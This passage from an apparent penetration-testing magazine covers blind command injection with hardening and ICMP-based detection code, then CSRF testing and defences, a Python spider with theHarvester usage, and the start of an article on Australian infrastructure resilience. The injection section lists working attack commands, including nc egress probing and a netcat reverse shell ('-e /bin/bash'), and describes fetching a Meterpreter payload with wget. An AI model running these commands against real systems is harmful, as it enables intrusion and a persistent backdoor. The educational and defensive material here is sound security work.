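    shell=True hands the string to /bin/sh, so a ';' in the parameter starts a
    second command whose output never reaches the page (the blind case)."""
    cmd = f"cat {DOC_ROOT}/{filename}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def is_safe_name(filename: str) -> bool:
    """Allowlist one plain path component: no separators, no shell metacharacters."""
    return bool(SAFE_NAME.match(filename)) and filename not in (".", "..")


def hardened_view(filename: str) -> str:
    """'After': validate the name, confine it to DOC_ROOT, and never invoke a shell.
    The argv list form means ';', '|', '`' and '$' are ordinary bytes in a path."""
    if not is_safe_name(filename):
        raise ValueError("rejected filename")
    target = (DOC_ROOT / filename).resolve()
    if DOC_ROOT.resolve() not in target.parents:
        raise ValueError("path escapes document root")
    return subprocess.run(["cat", str(target)], capture_output=True, text=True).stdout


def looks_like_injection(param: str) -> bool:
    """Log/WAF-side check: shell metacharacters in a parameter that should name a file."""
    return re.search(r"[;&|`$(){}<>\n]", param) is not None


if __name__ == "__main__":
    setup_demo_files()
    print(hardened_view("notes.txt"), end="")
    print("flagged:", looks_like_injection("notes.txt; id"))
```

The hardened handler rejects the input before anything is executed, so neither the visible nor the blind variant of the injection has a path to the shell; the log check is the signal to alert on when such parameters show up in requests to an Internet facing host.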
Figures 5 and 6 show the injected command that will determine which ports are listening on the target server, and the tcpdump capture of the associated packets. Once these packets are captured, the results can be parsed to determine which ports are actually listening. Load the tcpdump file and awk out the data for the packet length. Remove the standard ping packet size from the packet length and dump the data to a text file. The final results will return the listening ports found on the target server; the command to do this is in Listing 6. This data will show the actual ports that are listening on the web server behind the firewall. These ports also may not have been correctly configured to prevent connection initiation on the web server side.

These ports are a starting point to determine if connections can egress out through the firewall to the target listening host. Figure 7 shows the listening ports discovered. Now that the potential open ports have been determined, netcat will be used to connect to the listening server on each of those ports. When it connects, a message will be sent to signify which ports can make it through with data. To capture all the message details, the tcpdump listener has to be adjusted to capture traffic from the target server to the listening server, as shown by Listing 7. Listing 8 shows the injected command that will iterate through the list of ports that were discovered open and echo a greppable message "Mark port #" to the listening server. This restricted list of ports is used instead of a range at first because it is stealthier and less likely to be caught. If this did not work, blocks of ports could be tested in a range fashion. These techniques are utilized to prevent an IDS/IPS solution from detecting the outgoing port queries. Figure 8 shows the injected command used to iterate over the possible ports that might be granted external access. Listing 9 shows how to read and grep the data out of the pcap file based on the "Mark port" flag to determine which ports can be communicated on.

Once the egress ports have been verified, a back door into the system can be set up. Figure 9 shows the egress ports discovered. Listing 10 shows how to set up a netcat listener that will accept connections to it. This is so that data can be exfiltrated from the target system. Listing 11 provides the injection for the backdoor onto the target system. What the command is designed to do is send a connection back to the listening server over the specified port. Once access has been established, the Bourne Again Shell (BASH) interpreter will accept commands through the listening service on the attacker's machine. Figure 10 shows the injection in action. Access to the system has been granted, as shown by Figure 11.

From here multiple attack avenues can be taken to further compromise the DMZ and eventually the internal network. One of the simplest methods would be to set up an Internet facing web server owned by the attacker. On that web server would be a pre-built Linux Meterpreter payload that had an egress port configured that was determined accessible by the previous reconnaissance, but different than the netcat shell that is in use. The file could be downloaded on to the compromised host with the wget application. Once the payload was executed on the compromised host, further attacks and pivots into the network would be greatly simplified.

Figure 5. BCLIi Command to Discover Listening Ports
Figure 6. The Capture of Fourteen (14) Packets
Figure 7. Shows Ports Discovered
Figure 8. The Injection of The Egress Connection Test

Listing 4. The tcpdump Command to Capture ICMP Echo Requests Into a pcap
sudo tcpdump 'icmp[icmptype]=icmp-echo' -vvv -s 0 -X -i any -w /tmp/listening_ports.pcap

Listing 5. BCLIi Command to Determine Listening Ports
netstat -lntp | grep LISTEN | awk '{print $4}' | cut -d: -f2 | grep -ve "^$" | sort -u | while read line ; do TOTAL=$(($line + 56)) ; if [ "$TOTAL" -lt "65527" ] ; then ping -c 1 -s $TOTAL <listening_server_ip> ; fi ; done

Listing 6. Command to Read Contents of pcap and Find Egress Ports
sudo tcpdump -r /tmp/listening_ports.pcap | awk '{print $14}' | while read line ; do PORT=$(($line-64)) && echo $PORT >> /tmp/ports.txt ; done

Listing 7. The Command to Grab Egress Connection Messages
sudo tcpdump -vvv -s 0 -X -i any 'src host <target_ip> and dst host <listening_server_ip>' -w /tmp/egress_ports.pcap
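The channel Listings 5 and 6 rely on is visible to a defender: the result is carried in the size of outbound ICMP echo requests, and a server has no reason to emit a burst of echo requests of many different sizes. The following is an added detection example, not part of the article; it parses tcpdump summary lines (the sample lines are constructed) and flags source/destination pairs that sent several echo requests whose ICMP length is not one a stock ping client produces. The baseline lengths, threshold and function names are assumptions.

```python
# Added example (not from the article): detection logic for the ICMP size
# channel used above, run over constructed tcpdump summary lines.  The default
# ping payload is 56 bytes, so a stock echo request has ICMP length 64; the
# technique sends 65 for "true" and 64 + port for each listening port.
import re
from collections import defaultdict

# Matches the one-line summary tcpdump -n prints for an echo request.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>[\d.]+) > (?P<dst>[\d.]+): ICMP echo request, "
    r"id (?P<id>\d+), seq (?P<seq>\d+), length (?P<length>\d+)$"
)

# ICMP lengths stock ping clients send: 56 + 8 (Linux/Unix) and 32 + 8 (Windows).
BASELINE_LENGTHS = {64, 40}

# Constructed sample capture: one host emits odd-sized bursts, another pings normally.
SAMPLE_LOG = """\
12:00:00.100000 IP 10.0.0.5 > 203.0.113.10: ICMP echo request, id 1, seq 1, length 64
12:00:01.200000 IP 10.0.0.5 > 203.0.113.10: ICMP echo request, id 2, seq 1, length 65
12:00:02.300000 IP 10.0.0.5 > 203.0.113.10: ICMP echo request, id 3, seq 1, length 86
12:00:02.400000 IP 10.0.0.5 > 203.0.113.10: ICMP echo request, id 4, seq 1, length 144
12:00:02.500000 IP 10.0.0.5 > 203.0.113.10: ICMP echo request, id 5, seq 1, length 507
12:00:05.000000 IP 10.0.0.9 > 10.0.0.1: ICMP echo request, id 6, seq 1, length 64
12:00:06.000000 IP 10.0.0.9 > 10.0.0.1: ICMP echo request, id 6, seq 2, length 64
"""


def parse_echo_requests(text):
    """Return (src, dst, icmp_length) for every echo-request summary line."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append((m["src"], m["dst"], int(m["length"])))
    return records


def off_baseline(records):
    """Every echo request whose ICMP length is not one a stock ping would produce."""
    return [r for r in records if r[2] not in BASELINE_LENGTHS]


def find_size_channel(records, min_distinct=3):
    """Flag (src, dst) pairs that sent at least min_distinct different non-baseline
    lengths.  The value is the decoded list (length - 64): under the article's
    scheme these are the port numbers, with 1 being the 'netcat present' marker."""
    sizes = defaultdict(set)
    for src, dst, length in off_baseline(records):
        sizes[(src, dst)].add(length)
    return {
        pair: sorted(length - 64 for length in lengths)
        for pair, lengths in sizes.items()
        if len(lengths) >= min_distinct
    }


if __name__ == "__main__":
    recs = parse_echo_requests(SAMPLE_LOG)
    for pair, decoded in find_size_channel(recs).items():
        print(f"{pair[0]} -> {pair[1]}: {len(decoded)} odd-sized echoes, decoded {decoded}")
```

The decoded values only make sense under this article's encoding; the generic signal is the one off_baseline() returns, and for a DMZ web server that should not be pinging external addresses at all, a single non-default echo request leaving the network is already worth an alert.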
Figure 9. The Results of the Grepped Data
Figure 10. The Injection of The Backdoor Start-up
Figure 11. The Interaction with The Backdoored System

Listing 8. The Command Injected to Determine Which Ports Can Connect Out
for line in 139 22 25 3000 3001 3790 443 445 16352 53 5432 587 631 7337 80 8307 9000 902 ; do echo "Mark port $line" | nc -n <listening_server_ip> $line ; done

Listing 9. The Command to Grep Out The Egress Connection Message
sudo tcpdump -r /tmp/egress_ports.pcap -X | pcregrep -M 'Mark.port\n.*'

Listing 10. The Command to Start a netcat Listener on The Waiting Server
sudo nc -l -p <port>

Listing 11. The Injected Command to Start a Backdoor
nc -v 192.168.75.171 <port> -e /bin/bash

CHRIS DUFFY
Chris Duffy is currently the Lead Penetration Tester of Knowledge Consulting Group. He has held a number of Information Technology and Security positions such as Cyber Warfare Specialist, Senior Systems Engineer, Senior Systems Administrator, Conventional Systems Maintenance Supervisor, Network Infrastructure Supervisor, Cryptographic Technician, Satellite Communication (SATCOM) Technician and SATCOM Operator. He has attained three degrees: an M.Sc. in Information Security and Assurance, a B.Sc. in Computer Science, and an A.A.S. in Electronic Systems Technology. He has earned a number of certifications which include eCPPT, CEH, CNDA, CHFI, EDRP, GSEC, G2700, CWSP, CWNA, VCP, RHCT, CIW:SP, CIW:WSS, CIW:WSE, CIW:WSA, CIW:WFA, CIW:A, BAIS, Security+, Network+, A+, NSTISSI No 4011, NSTISSI No 4012.
CSRF Testing and its Protection Using RequestRodeo

Cross Site Request Forgery (CSRF) is one of the most common attacks on the Internet today. Attackers find it easy to exploit because it does not require any authentication information or session cookies, only that the user be authenticated to the application. Furthermore, it is possible on every platform and it does not matter which authentication type the application uses.

CSRF: Cross Site Request Forgery is an attack that enables the adversary to execute malicious requests from different domains, or from the same domain (if stored CSRF is there), in order to perform unwanted actions without the user's knowledge. This request automatically includes authenticated data, such as session information or HTTP authentication credentials. This requires having prior access and knowledge of vulnerable applications. The purpose of a CSRF attack is to exploit implicit authentication. If our session is active and we click any forged link which contains a malicious request, then it will automatically include our authenticated data/session information and make this HTTP request valid because of implicit authentication. Implicit authentication can be done in 4 ways:

Client Side SSL
X.509 Certificates and digital signatures are used for authentication.

Cookies
The server sets a cookie in the client web browser (found in the response header as the "Set-Cookie" field) and after that this cookie goes in each request; if the server finds this valid cookie, it treats the request as valid and thus authenticates the user (Figure 1).

IP Based Authentication
This authentication is generally used on intranet infrastructure. Authentication is done with only the IP/MAC, without entering username and password (Figure 2).

HTTP Authentication
There are 3 types of HTTP Authentication: NTLM, Basic, Digest.

Figure 1. Cookie Based Authentication

Types of CSRF
There are two types of CSRF attack: Reflected CSRF and stored CSRF. In a Reflected CSRF vulnerability, the attacker uses a system outside the application to perform this attack and provides the exploit link to the victim. In a Stored CSRF attack, the attacker uses the application which is itself vulnerable to CSRF to provide the victim with the exploit link in order to perform the desired action.

Login CSRF
Sometimes an attacker creates a forged link using his own username and password. The main purpose of this is to obtain an idea of the victim's interests and activities, which helps the attacker in further attacks. An attacker can also view the search history by making users log in as the attacker, i.e. the victim visits the attacker's site in which he stored the malicious Google login link, causing the victim to be logged into Google as the attacker, and now all his web searches will be stored in the attacker's search history.

Example
There is a website xyz.com which allows registered users to post HTML messages as global messages (like scraps in orkut). This site is not performing input sanitization for the posted messages. So we can say this website is vulnerable to stored CSRF. If an attacker posts any malicious link then any user who clicks on that link will be affected by the desired malicious script action. A simple example of this attack can be illustrated by a situation when an attacker creates a logout link and posts that link in a scrap; then every user will log out whenever he clicks that link.

Figure 2. IP Based Authentication
How to Test CSRF in an Application (Practical Scenario)

Step 1
Let's assume there is a web application which has a feature "add clients". We log in and search for a client; you can see the bracket on the left side of Figure 3.

Step 2
The user creates a client and captures the request in an intercepting tool (like Burp Suite; Figure 4).

Step 3
Create an HTML page of this request (Figure 5).

Note
It may be difficult for newbies to create an HTML page from the captured request. They can use the tool "Pinata" to create an HTML page automatically.

Step 4
Now, log in again to the application and open the crafted HTML file in a new tab of the same browser where the user is logged in (Figure 6).

Step 5
Click the submit button and check whether the client has been added successfully or not. If it was done successfully, then this website is vulnerable to CSRF attack (Figure 7).

How CSRF Attack Works
An attacker creates a special page and tricks the user into visiting it while the user is logged in to the application. This special page triggers a request to the application with the user's session information. This request is used to add a client. The request is forged to look like a valid request for this operation. All the details required for the operation to succeed are present as query-string/POST variables. When the request is sent from the victim's machine, valid cookies with the session information are also sent. The application mistakenly treats the request as valid because it contains the cookies. So, the operation succeeds without the user's knowledge. The special page is quite easy to create. It might be a simple HTML page with an <img alt="" src="" /> tag with the source pointing to the page that performs the operation.

Figure 3. Add Client feature of an anonymous application
Figure 4. Request is captured in burp proxy
Figure 5. HTML page of the captured request
Figure 6. Submit button found after opening HTML page
Figure 7. It confirms that the Client "TESTAAAAAAAA" has been added successfully
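What makes the test in Steps 1 to 5 succeed is that the application accepts the session cookie as the only proof that the user meant to send the request. The following is an added example, not the article's code, of the two developer-side mitigations the article lists further on (an Origin/Referer check and a secret validation token bound to the session) applied to the "add client" request. Requests are modelled as plain dicts so the example runs offline; SITE_ORIGIN, the session store and the handler names are assumptions.

```python
# Added example (not the article's code): Origin/Referer checking plus a per-session
# secret validation token, applied to the "add client" request tested above.
# Requests are plain dicts; SITE_ORIGIN and the handler names are assumptions.
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://app.example"          # constructed application origin
SESSIONS = {}                                # session id -> {"user": ..., "csrf": token}


def login(user):
    """Issue a session id and a CSRF token bound to that session."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid):
    """Token the legitimate 'add client' form embeds as a hidden field."""
    return SESSIONS[sid]["csrf"]


def origin_ok(headers):
    """Browsers set Origin on cross-site POSTs; fall back to Referer.  A missing
    value is rejected rather than trusted, so <img>-triggered requests fail here."""
    value = headers.get("Origin") or headers.get("Referer")
    if not value:
        return False
    parts = urlsplit(value)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def add_client_handler(request, clients):
    """Return (status, message).  The cookie alone never authorises the action."""
    sess = SESSIONS.get(request["cookies"].get("session"))
    if sess is None:
        return 401, "not logged in"
    if request["method"] != "POST":
        return 405, "method not allowed"
    if not origin_ok(request["headers"]):
        return 403, "cross-origin request rejected"
    sent = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(sent, sess["csrf"]):
        return 403, "missing or invalid CSRF token"
    clients.append(request["form"]["name"])
    return 200, "client added"


def legitimate_request(sid, name):
    """What the application's own form sends."""
    return {"method": "POST",
            "headers": {"Origin": SITE_ORIGIN},
            "cookies": {"session": sid},
            "form": {"name": name, "csrf_token": csrf_token_for(sid)}}


def forged_request(sid, name):
    """The crafted page from Step 3: the browser attaches the session cookie, but the
    Origin is the attacker's site and the hidden token is unknown to the attacker."""
    return {"method": "POST",
            "headers": {"Origin": "https://attacker.example"},
            "cookies": {"session": sid},
            "form": {"name": name}}
```

Either check alone defeats the crafted page; using both means a browser that omits Origin on some request types still cannot be talked into a state change without the token, and the token comparison uses hmac.compare_digest so its timing does not leak how many characters matched.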
CSRF Protection
For protecting against CSRF a few defences are available. They are categorized from the developer and end user perspective:

General CSRF Mitigation for User
• Log off when you have finished using the application
• Don't store username & password in a browser
• Clear all cookies after finishing your important work/transactions
• Use browser add-ons like NoScript for Mozilla Firefox
• Use multiple browsers, i.e. one for accessing sensitive sites and one for other activities

General CSRF Mitigation for Developer
• Session Time-out
• Confirmation Pages like "Are you sure you want to transfer $500 to user XYZ?"
• Captcha Implementation
• Check for Referer header
• Checking Origin header
• URL Rewriting
• Re-authentication for sensitive actions
• View State for ASP.Net
• Double Submit Cookies

Other CSRF Defences
• Secret Validation token
• Referrer Validation
• Custom HTTP Header
• Request rodeo token in a request

CSRF defences are unable to understand this automatic inclusion of authenticated data in an HTTP request. To prevent this automatic process of including the authenticated data one can use the help of a proxy. The only problem in this solution is that it is unable to prevent attacks that exploit client side SSL authentication. In this concept the proxy will sit in between browser and server. In this way it can examine each request and response before forwarding it to the server or the client. This proxy can also modify the request and response automatically. So we can say the proxy helps us in:
• Identification of malicious requests
• Removing the automatic inclusion of authenticated data in a request
• Protecting against image based CSRF attacks by examining the response and blocking the static image URL if found suspicious, otherwise forwarding it to the client without any modification, as most web browsers don't validate the image element attribute before processing this image request

Implementation of Proxy
• In the web browser (proxy integrated directly into the web browser)
• In between web browser and server. The proxy analyses data as it passes through the proxy.
Implementing approach 1 is time consuming and we have to integrate with each and every browser. The second approach will work for all browsers as it is not integrated with any particular browser. So, now for any transaction or any action, the request will go from our system to the proxy and then to the server, and vice versa. As the proxy is a different entity here, it will verify each and every request generated from a client's web browser.

Steps
Step 1
For a legitimate request 4 conditions should be met:
• Submitting an HTML form or any other way of interaction from a webpage.
• It should follow the same origin policy.
• Destination host and path using cached credentials. Cached credentials are used for automatic login.
If the above mentioned conditions are met, then the request is treated as legitimate.

Step 2
Now only the legitimate request can carry the implicit authentication. The proxy intercepts each and every HTTP response and searches for code which can create a request, e.g. if in the response the code is like "onclick document.location = <any url>", then it appends a unique token to the URL and stores the token value and response for future reference. Now this token will be received in the next HTTP request from the client side. The proxy intercepts the HTTP request generated from the client and checks for the token value. If the request does not contain the token, or it does not match the token stored with the prior response, then the proxy removes the authentication information from the request before forwarding it to the server. When a server receives a request without authentication parameters it sends a 401 response to the client for re-authentication. When a user gets a 401 response code the browser prompts for username and password, and after the credentials are entered it automatically sends them in each request and the user is totally unaware of this; so, to protect against this automation of submitting authentication, the proxy sends a 302 temporarily moved response and appends a token to the URL. If the token matches then the proxy treats it as a valid request and verifies the above mentioned conditions. If it also satisfies these conditions it is treated as a valid request generated from the same HTML page and forwarded to the server (Figure 8). To remove automatic inclusion of authenticated information the server follows these steps:
• When the server finds any request suspect, it sends a 302 response and appends a request rodeo token to the URL.
• Now the client receives a URL as a redirected response and requests that URL.
• Now the server will receive an HTTP request with the request rodeo token value, and this time it removes the authentication header and sends a 401 unauthorized response to the client asking for re-authentication.
• This time the client re-authenticates himself and sends an HTTP request with the request rodeo token.
• Now the proxy examines the request and if validated then forwards it to the server (Figure 8).

Figure 8. Client-Server Communication

IP Based Authentication
IP Based Authentication is a technique which is generally used in intranet infrastructure. It uses the client MAC or IP as the authentication token. For the IP Based authentication scheme, the proxy implements a reflection server which is used to determine whether IP Based authentication is used or not. This reflection server is always placed in front of the firewall. Whenever the proxy finds any suspicious request it sends it to the reflection server for verification, and the reflection server then verifies this request as legal based on the response received from the server after changing the HTTP method to a HEAD request. If the response is OK, it means IP based authentication is not running; it sends this response to the proxy and then the proxy treats it as an illegal request and stores this response for future use as long as the user IP address is the same.

Reference: OWASP RequestRodeo Project.
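The proxy behaviour described in Steps 1 and 2 reduces to two operations on the traffic it relays: stamp every URL in an outgoing response with a token and remember which page issued it, then forward credentials on an incoming request only when it carries a token issued by a page of the same origin as its destination. The following is an added illustration of that logic, not RequestRodeo's own code: it handles the same-origin condition and the "remove the authentication information" step, and treats a request with no token, or with a token issued by a page on another origin (the cross-site <img> case), as one that must travel without cookies or Authorization header. The token parameter name, class and function names are assumptions.

```python
# Added example (not RequestRodeo's own code): the core of the proxy logic the
# article describes.  On the way out, every URL in a response gets a fresh token
# and the proxy records the origin of the page that issued it; on the way in,
# credentials are forwarded only for a token issued by a page of the same origin
# as the destination.  All other requests are forwarded with Cookie/Authorization
# stripped.  The parameter name and class/function names are assumptions.
import re
import secrets
from urllib.parse import urljoin, urlsplit, parse_qs

TOKEN_PARAM = "rrtoken"
URL_ATTR_RE = re.compile(r'(?P<attr>\b(?:href|src|action))="(?P<url>[^"]+)"')
STRIP_HEADERS = ("Cookie", "Authorization")


def origin_of(url):
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}"


def urls_in(html):
    """URLs found in href/src/action attributes, in document order."""
    return [m["url"] for m in URL_ATTR_RE.finditer(html)]


class RequestRodeoProxy:
    def __init__(self):
        self.issued = {}   # token -> origin of the page the token was embedded in

    def rewrite_response(self, page_url, html):
        """Append a unique token to each URL in the response and remember its issuer."""
        page_origin = origin_of(page_url)

        def add_token(m):
            absolute = urljoin(page_url, m["url"])
            token = secrets.token_urlsafe(12)
            self.issued[token] = page_origin
            sep = "&" if "?" in absolute else "?"
            return f'{m["attr"]}="{absolute}{sep}{TOKEN_PARAM}={token}"'

        return URL_ATTR_RE.sub(add_token, html)

    def filter_request(self, url, headers):
        """Return (headers_to_forward, verdict).  Credentials survive only for a
        request whose token was issued by a page of the destination's origin."""
        token = parse_qs(urlsplit(url).query).get(TOKEN_PARAM, [None])[0]
        issuer = self.issued.get(token) if token else None
        if issuer is not None and issuer == origin_of(url):
            return dict(headers), "forwarded with credentials"
        cleaned = {k: v for k, v in headers.items() if k not in STRIP_HEADERS}
        if issuer is None:
            return cleaned, "no valid token: credentials removed"
        return cleaned, "cross-origin token: credentials removed"
```

A request that arrives stripped of its cookie reaches the server as an unauthenticated request, which is exactly what makes the server answer with the 401 or 302 the article describes; the proxy never has to know what the application's actions mean, only where the request was born.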
NITIN GOPLANI
Nitin Goplani has been working with Aujas as a Security Researcher in the Telecom Security domain. With a rich background in application, mobile and network security, Nitin is now involved in researching new and emerging threats to Telecom Core Nodes. Apart from research, Nitin also assists in the implementation of security measures for Fixed/Mobile Networks (2G/3G/LTE) and core fixed network systems to regulate access to specific network elements for the secure operation of the core fixed network and all its variants.
Horst Görtz Institute for IT Security Interdisciplinary Research
Network for IT Security nrw-units strengthens companies in NRW by boosting networking along the whole value-added chain, supporting user companies and stimulating cooperation between economy and research. Another aim is to enlarge the leading position of companies and research institutes in Europe and develop national and international visibility in the IT security sector. Partners in nrw-units are the Horst Görtz Institute for IT Security, eco - Association of the German Internet Industry and networker NRW e.V. nrw-units is funded by the Ministry for Economy, Energy, Industry, Medium-sized Businesses and Trade and the European Union. Become a units-member!
www.nrw-units.de
Open Position: Post Doc The German Research Foundation awarded more than €4 million to the HGI for the establishment of the interdisciplinary research training group "New Challenges for Cryptography in Ubiquitous Computing". We are looking for candidates with an outstanding Ph.D. in computer science, electrical engineering, mathematics or a related area. Apply now!
www.ubicrypt.org
ITS.Connect 2013 We connect graduates and companies.
June 28, 2013 Bochum, Germany
Germany's unique IT Security Recruiting Exposition Whether business or science, employer or graduate, here starts the way into your future. This is where innovative minds and good graduates who make the digital world of tomorrow a little safer meet employers with exciting challenges. Take part and start your future now.
www.hgi.rub.de/itsc2013 Horst Görtz Institute for IT Security | Ruhr-University Bochum | Dr. Nina Winter | Scientific Coordinator | www.hgi.rub.de | hgi-of[email protected]
Python for Coders and Pentesters

A word that needs no introduction for InfoSec coders: the Python programming language was a gift to the web world by Guido van Rossum. Most of the time InfoSec evangelists need to write a Proof Of Concept [POC], automate attacks or customize some of their tools, and these tasks can create a lot of headaches. The solution to these problems can be a simple PY file. Easy to learn syntax and a huge set of third party libraries can simply solve our problems, and the best part is that Python is open source.

Target Audience
I would like to welcome all the coders as well as pentesters. The welcome of coders seems obvious, but pentesters might be wondering why they are welcome. This is to enable new pentesters (particularly those who are not considered ninjas in coding) to learn the implementation of various tools that are already created. The best part is our favorite Operating System (BackTrack), which is already enriched with scripts written in this language.

Scope
Most of the time when I write, read or learn any language or technology, the very first question that arises in my mind is the scope of the assets. In my experience in Information Security, Python is one of the best languages for automation or for creating new tools. If you are interested in working with Java, .NET, game development, web application development, socket programming, scripting, GUI and IT security programming, Python can be a one word answer. I would suggest visiting http://www.python.org at least once.

Hardware/Software Requirements
There are no hardware requirements for the interpreter of this language, although there are many software setups that you may prefer to play with. A platform that I recommend most of the time is Linux, but the Windows platform will do as well. Linux users are already equipped with this weapon: just type python in your terminal. For Windows you will need to install it manually.
Understanding with a Real Case Study

Example for Coders
It would be very helpful for a coder to create a powerful web-spider with just a few lines of code. Most of the time, searching for online information about the client is painful, and it would help us if someone could automate this task. Usually a few lines of code in PHP or in Java can do it, but with Python we can make it much easier (Listing 1). Most code lovers will notice that the task of finding links and descriptions about a web-based application can be simplified by this fifteen-line script. Not only this, but SQLmap can also be added: the output from this script can be fed into SQLmap so that all these links can be checked for SQL injection vulnerability.

Page 56
http://pentestmag.com

Listing 1. Web-spider code

    # Python 3 form of the original (Python 2) listing; the "fi" ligature was lost
    # in extraction, so find_all had become nd_all.
    import sys
    from urllib.request import urlopen

    from bs4 import BeautifulSoup   # third-party: pip install beautifulsoup4 lxml


    def processURL(url):
        httpResp = urlopen(url)
        if httpResp.status == 200:
            print(url)
            html = httpResp.read()
            bs = BeautifulSoup(html, "lxml")
            # Page layout this was written for: each result sits in a
            # <div class="three-quarter"> holding a <div class="link"> and an <a>.
            links = bs.find_all('div', {'class': 'three-quarter'})
            if not links:              # nothing matched: avoid an IndexError below
                print('\tNo matching content found')
                return
            title = links[0].find_all('div', {'class': 'link'})
            title = title[0].text.strip()
            desc = links[0].find_all('a')
            desc = desc[0].text.strip()
            print('\tTitle: ' + title)
            print('\tDescription: ' + desc)
            print('\n\n')


    if __name__ == "__main__":        # usage: python spider.py <url>
        processURL(sys.argv[1])

Example for Pentesters
Now, I would also like to discuss some examples for pentesters, too. The BackTrack operating system is full of various useful Python scripts that can be directly applied to our pentesting purposes. One of the very useful aspects of any pentest starts with "information gathering", but most pentesters try to skip this step. I would highly recommend spending most of your time on this step. Let's make use of Python to speed up the process. The script that I'll talk about is well known as theHarvester and is available in the /pentest/enumeration/theharvester directory of BackTrack. For the purpose of this article I am using BackTrack 5, revision 2 (Figure 1). I would appreciate it if you would open this script and give it a try to understand it. But at this point, I have done a quick example on my own website to demonstrate to you how easily we can gather details about any website using this script (Figure 2). The command used is:

./theHarvester.py -d any-example-website.com -l 100 -b google

There are many useful scripts in this OS and many more are available via a Google search as well.
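The spider in Listing 1 needs BeautifulSoup and a live site. As an added example (not the author's code), here is the same link-and-description extraction written with the standard library only, run offline on a constructed page, with the relative-URL resolution, duplicate removal and same-host filter a real spider needs before its output is handed to any other tool; `LinkCollector`, `extract_links` and the sample HTML are mine, not from the article.

```python
"""Link-and-description extractor in the spirit of Listing 1, standard library
only, so it runs offline on captured HTML (added example, not the author's)."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class LinkCollector(HTMLParser):
    """Collects every <a href> on a page together with its visible text."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.links = []            # list of (absolute_url, anchor_text)
        self._current_href = None
        self._text_parts = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self._current_href = urljoin(self.base_url, href)
                self._text_parts = []

    def handle_data(self, data):
        if self._current_href is not None:
            self._text_parts.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._current_href is not None:
            # collapse runs of whitespace, as Listing 1's .strip() intends
            text = " ".join("".join(self._text_parts).split())
            self.links.append((self._current_href, text))
            self._current_href = None


def extract_links(base_url, html, same_host_only=True):
    """Return de-duplicated (url, description) pairs found in `html`.

    Relative hrefs are resolved against `base_url`; mailto:/javascript: links
    are dropped, fragments are stripped before de-duplication, and by default
    links to other hosts are dropped so the spider stays within the site
    that is actually in scope for the review.
    """
    parser = LinkCollector(base_url)
    parser.feed(html)
    parser.close()
    host = urlparse(base_url).netloc
    seen, result = set(), []
    for url, text in parser.links:
        parts = urlparse(url)
        if parts.scheme not in ("http", "https"):
            continue
        if same_host_only and parts.netloc != host:
            continue
        clean = parts._replace(fragment="").geturl()
        if clean in seen:
            continue
        seen.add(clean)
        result.append((clean, text))
    return result


# Constructed sample page (not a real site); it exercises each edge case above.
SAMPLE_HTML = """
<html><body>
<div class="three-quarter">
  <div class="link"><a href="/about">About  us</a></div>
  <a href="products.html#top">Products</a>
  <a href="products.html">Products (again)</a>
  <a href="mailto:webmaster@example.com">Mail</a>
  <a href="https://other.example.org/x">External</a>
  <a href="javascript:void(0)">Menu</a>
</div>
</body></html>
"""

if __name__ == "__main__":
    for url, text in extract_links("https://www.example.com/index.html", SAMPLE_HTML):
        print(url)
        print("\tDescription: " + text)
```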
Path to go Further and Conclusion
All things considered, I would like to state that every pentester should have a little knowledge of this great language. The BackTrack operating system itself has got a few sets of Python code directories in it, so it can be used for future editions. Tools like dnsrecon, goofile and metagoofil are just a few examples that can help us a lot. Apart from these built-in tools, you can import third-party libraries to perform a variety of tasks.

Figure 1. theHarvester script

For the purpose of performing forensics on an Android platform please visit: https://code.google.com/p/androguard/. If you are used to writing fuzzing programs you will need a Python library that can be downloaded from here: https://bitbucket.org/haypo/fusil/wiki/Home. This is just a start for a Python InfoSec coder; lots of DDoS attacks and wireless battles can be won with this weapon.

Figure 2. theHarvester script demonstration

HITESH CHOUDHARY
Hitesh Choudhary is an ethical hacker from India, serving the Rajasthan police for free to handle cyber crimes, as well as pursuing his wireless research at M.I.T., California. He has completed his RHCE, RHCSA, CEH and various other security certifications. His recent work for the code society can be seen at www.EduacationTube.net.

StartKit 01/2013(01)
LET'S TALK ABOUT SECURITY
Penetration Testing a Nation: Is Australia Safe from Attack?
This article looks at some of the wider issues related to penetration testing and security – the "A" (availability) in the CIA security triad – and how an attack on inadequate national infrastructure could impact a global system. It considers threats in terms of terrorist attack and bandwidth availability, and how the national infrastructure would respond in a crisis, using Australia as an example.

Failure mode event analysis was used to highlight some of these issues, and the author has personally visited the sites discussed. The author has recently had to do this investigation on multiple occasions with Australia hosting components of a global system, and has personally experienced many 24 hour days recovering from failures in the areas of concern; so the potential issues facing this beautiful country and its wonderful people are used as a very real and pertinent example. Hopefully, this publication will prompt action by the Australian government – and the offer of free help from the author still stands; and hopefully the good friends of the author who work in this area won't be offended.
Why Look at the National Infrastructure in Relation to Security?
In 2011, whilst running infrastructure upgrades and disaster recovery (DR) testing in Canada for a system that is now part of the core of a well-known international money transmission company, a global system failure occurred at the same time as the planned failover to the DR infrastructure took place. Essentially, users from Australia and New Zealand were unable to access the system in Canada at all, and there were some performance issues with users in Europe accessing the system.

Initial thoughts from most support people pointed to the failover to DR being the issue, but the difference in behaviour from different regions with this global system – with users in North America experiencing no issues whatsoever – suggested a more complex issue that required understanding. Phone calls to the support teams in Australia to investigate seemed to have issues, but eventually a traceroute was obtained and this showed packets going into a core shared environment exiting the ISPs in Sydney and then either timing out when transmitted under the ocean or taking several seconds to traverse the Pacific. Investigation of the European issues showed some unrelated networking problems that were related to accessing a different target server, and some issues also related to access to data in Australia and New Zealand. The key to identifying the issue was the traceroute showing delays into the Reach network, and even with additional cables going elsewhere the impact on the application was significant.

